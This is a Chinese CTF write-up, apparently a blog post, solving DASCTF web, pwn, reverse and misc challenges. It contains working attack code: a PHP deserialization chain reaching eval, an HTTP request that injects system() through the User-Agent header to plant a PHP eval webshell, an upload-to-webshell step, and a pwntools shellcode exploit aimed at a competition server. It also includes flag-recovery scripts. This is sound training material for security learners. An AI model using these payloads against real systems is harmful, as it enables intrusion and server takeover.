Web
PHP’s Ending
反序列化、eval截断、无参数RCE
<?php
// error_reporting(0);
// highlight_file(__FILE__);
class saday{
public $reason="things dont work as i expecting";
public function __construct($reason) {
$this->reason = $reason;
}
public function __destruct()
{
echo "today is a saday....,because".$this->reason."\n";
}
}
class chance{
public $choice;
public $better;
public function __construct($better) {
$this->better = $better;
}
public function __clone()
{
($this->better)();
}
}
class alright{
public $confidence;
public $tmp;
public function __construct($confidence,$tmp) {
$this->confidence = $confidence;
$this->tmp = $tmp;
}
public function __toString()
{
$this->tmp=clone $this->confidence;
return "alright...";
}
}
class shell{
public $cmd;
public function __construct($cmd) {
$this->cmd = $cmd;
}
public function __invoke()
{
echo "invoke";
if("moonsy"===preg_replace('/;+/',"moonsy",preg_replace("/[A-Za-z_]+\(+|\)/","",$this->cmd))){
echo 'moonsymoonsy';
eval($this->cmd."moonsy");
}
}
}
$chance = new shell('eval(next(getallheaders()));__halt_compiler();');
// $chance = new shell('phpinfo();__halt_compiler();');
$tmp = new chance($chance);
$alright = new alright($tmp,$tmp);
$saday = new saday($alright);
$a = serialize($saday);
echo urldecode($a);
echo "\n";
然后在写入一个webshell反弹
POST / HTTP/1.1
Host:80.endpoint-b3f1d96476b845ae903a4eb2b0350bd6.m.ins.cloud.dasctf.com:81
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: system("echo '<?php @eval(\$_POST[1]);?>' >1.php");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
test:id
moonsy=O:5:"saday":1:{s:6:"reason";O:7:"alright":2:{s:10:"confidence";O:6:"chance":2:{s:6:"choice";N;s:6:"better";O:5:"shell":1:{s:3:"cmd";s:46:"eval(next(getallheaders()));__halt_compiler();";}}s:3:"tmp";r:3;}}
webshell反弹之后在根目录下看到secret.txt,里面存着用户boogipop的密码
passwd:just_a_trick
su boogipop
之后直接cat /flag就行
web-game-1-1
在源码中飞机爆炸处理之后有一个GET参数请求
直接传scores即可获得flag:/useful.php?scores=1000000000
can_you_getshell
给了源码,但是登录后台需要账号密码,但是/admin/insert_php能直接任意文件上传
可以直接把下面的提交html代码复制出来,修改提交地址
然后抓包传Shell
直接蚁剑连接,根目录下有flag
Pwn
babyshell
Exp
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', log_level = 'debug') #info
path = "./babyshell"
#p = process(path)
p = remote('tcp.cloud.dasctf.com', 28992)
elf = ELF(path)
libc = elf.libc
def g():
gdb.attach(p)
raw_input()
sl = lambda arg : p.sendline(arg)
sla = lambda arg1, arg2 : p.sendafterline(arg1, arg2)
sd = lambda arg : p.send(arg)
ru = lambda arg : p.recvuntil(arg)
inv = lambda : p.interactive()
shellcode = asm(
"""
mov rax, 0x101
mov rdi, 0x20
push rsi
mov rbx, 0x67616c662f
push rbx
mov rsi, rsp
xor rdx, rdx
syscall
mov rdi, rax
xor rax, rax
pop rsi
pop rsi
mov rbx, rsi
add rbx, 0x500
push rsi
mov rsi, rbx
mov rdx, 0x200
syscall
xor rax, rax
inc rax
mov rdi, 1
syscall
"""
)
sl(shellcode)
inv()
Reverse
packed
拖入发现是upx的壳
直接使用upx脱壳失败,使用16进制编辑器将前三个PAC改成 UPX,然后脱壳
根据下面两个判断推测是一个魔改的RC4,使用的是加法
查看密文是34位,直接输入34个a,然后将input中的数据提取出来
Exp
#include<stdio.h>
int main()
{
unsigned char enc[] = {0x9E, 0x56, 0x81, 0x83, 0xBF, 0x4F, 0x7D, 0x83, 0xF0, 0x69, 0x0D, 0xBF, 0x7A, 0x86, 0xF7, 0x21, 0x5C, 0x04, 0x5F, 0x74, 0x64, 0xA5, 0x95, 0xCF, 0x6A, 0x72, 0x7E, 0x01, 0xF9, 0xC9, 0x9F, 0x51, 0xD3, 0x5F};
unsigned char data[] = {0xBB, 0x76, 0x8F, 0xA1, 0xCC, 0x6A, 0x63, 0x8F, 0xE3, 0x5A, 0x3A, 0xBD, 0x70, 0x82, 0xF4, 0x23, 0x5B, 0xEC, 0x61, 0xA1, 0x66, 0x9F, 0x84, 0xFD, 0x97, 0x5F, 0x80, 0x1A, 0x19, 0xE7, 0xB5, 0x6D, 0xE2, 0x43};
for(int i = 0; i < 34; i++)
{
printf("%c", (unsigned char)(enc[i] - (unsigned char)(data[i] - 'a')));
}
return 0;
}
// DASCTF{Unp4cked_by_4_gr34t_HACKER}
Misc
edocne
根据题目名称为encode的逆序,推测有逆序
逆序->base58->逆序->base64,解压里面的是firefox取证,以前做过一样的,GKCTF X DASCTF应急挑战杯Misc-Writeup FireFox Forensics:https://mochu.blog.csdn.net/article/details/118365556
直接脚本搜哈:https://github.com/lclevy/firepwd
Baby_TCP
pwd1.txt、pwd2.txt是4字节CRC爆破明文
PS C:\Users\Administrator\Downloads> php -r "var_dump(hex2bin('50615334576f7234'));"
Command line code:1:
string(8) "PaS4Wor4"
解hex得到压缩包密码: PaS4Wor4
zip.pcapng的data.data字段是传输数据的
直接tshark提取即可:tshark -r zip.pcapng -T fields -Y "data.data" -e data.data
直接丢进CyberChef解Hex
得到压缩包十六进制,简单处理下
zipData = "504b03041400010063003b865c56dd78da02f1000000d500000008000b00666c61672e74787401990700020041450300000783f4951373ddd080270982f705af88c0f9aa51e18d6c4f2dccbc3175fc85b18627cc162b426af443183d769c17adfbd9ae9bb4eb452d953508027dc6931dcbd32db10ecf9f2839a91f5980399ecd78b4d749b3033f5c42a7fdb3b2a92727ecab2380f53aaede40e141899b6a9584835f1de92843385939d942d3508e818f8851a31b23910defe4703c8c26d052dc4bc9cd7a2f94b7284e42fcda6d94515a92fca3895b580f0c74fe0122a06b90ed10213e0892e21c59f763bb50b0fd6ed583600e88e8a1ac95db6cd54cd934023906ddcb44f883deed7fe924a46a91feab42de1a4728bb78e717da3cb8c5f139fc2241504b010214001400010063003b865c56dd78da02f1000000d500000008002f000000000000002000000000000000666c61672e7478740a0020000000000001001800d322ee9f514bd901ab9112a0514bd9012d75a92f504bd9010199070002004145030000504b0506000000000100010065000000220100000000"
with open('flag.zip', 'wb') as f:
f.write(bytes.fromhex(zipData))
继续查看password.pcapng,发现data.data也有数据
但是提取出来没有正确的密码,继续查看发现端口存在异常,要么101要么100猜测最后一位为二进制
提取出来:tshark -r password.pcapng -T fields -Y "data.data" -e tcp.dstport
注意是含有data.data的端口,提取出来转化处理
binContent = ""
with open('data3.txt', 'r') as f:
lines = f.readlines()
for line in lines:
binContent += line.strip()[-1]
print(binContent)
解码二进制
得到压缩包密码,解压得到flag: Welcome to DASCTF. Congratulations. The password is DZhqDrck2LHX2kXWdcHuYhsX
You 3r4 v4ry sm3rt!
You 3r4 v4ry sm3rt!
You 3r4 v4ry sm3rt!
Thank you for your love for CTF!
Thank you for your love for CTF!
Thank you for your love for CTF!
DASCTF{b4a7c67f-5236-4bce-bcbe-1a2359337d49}
561
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
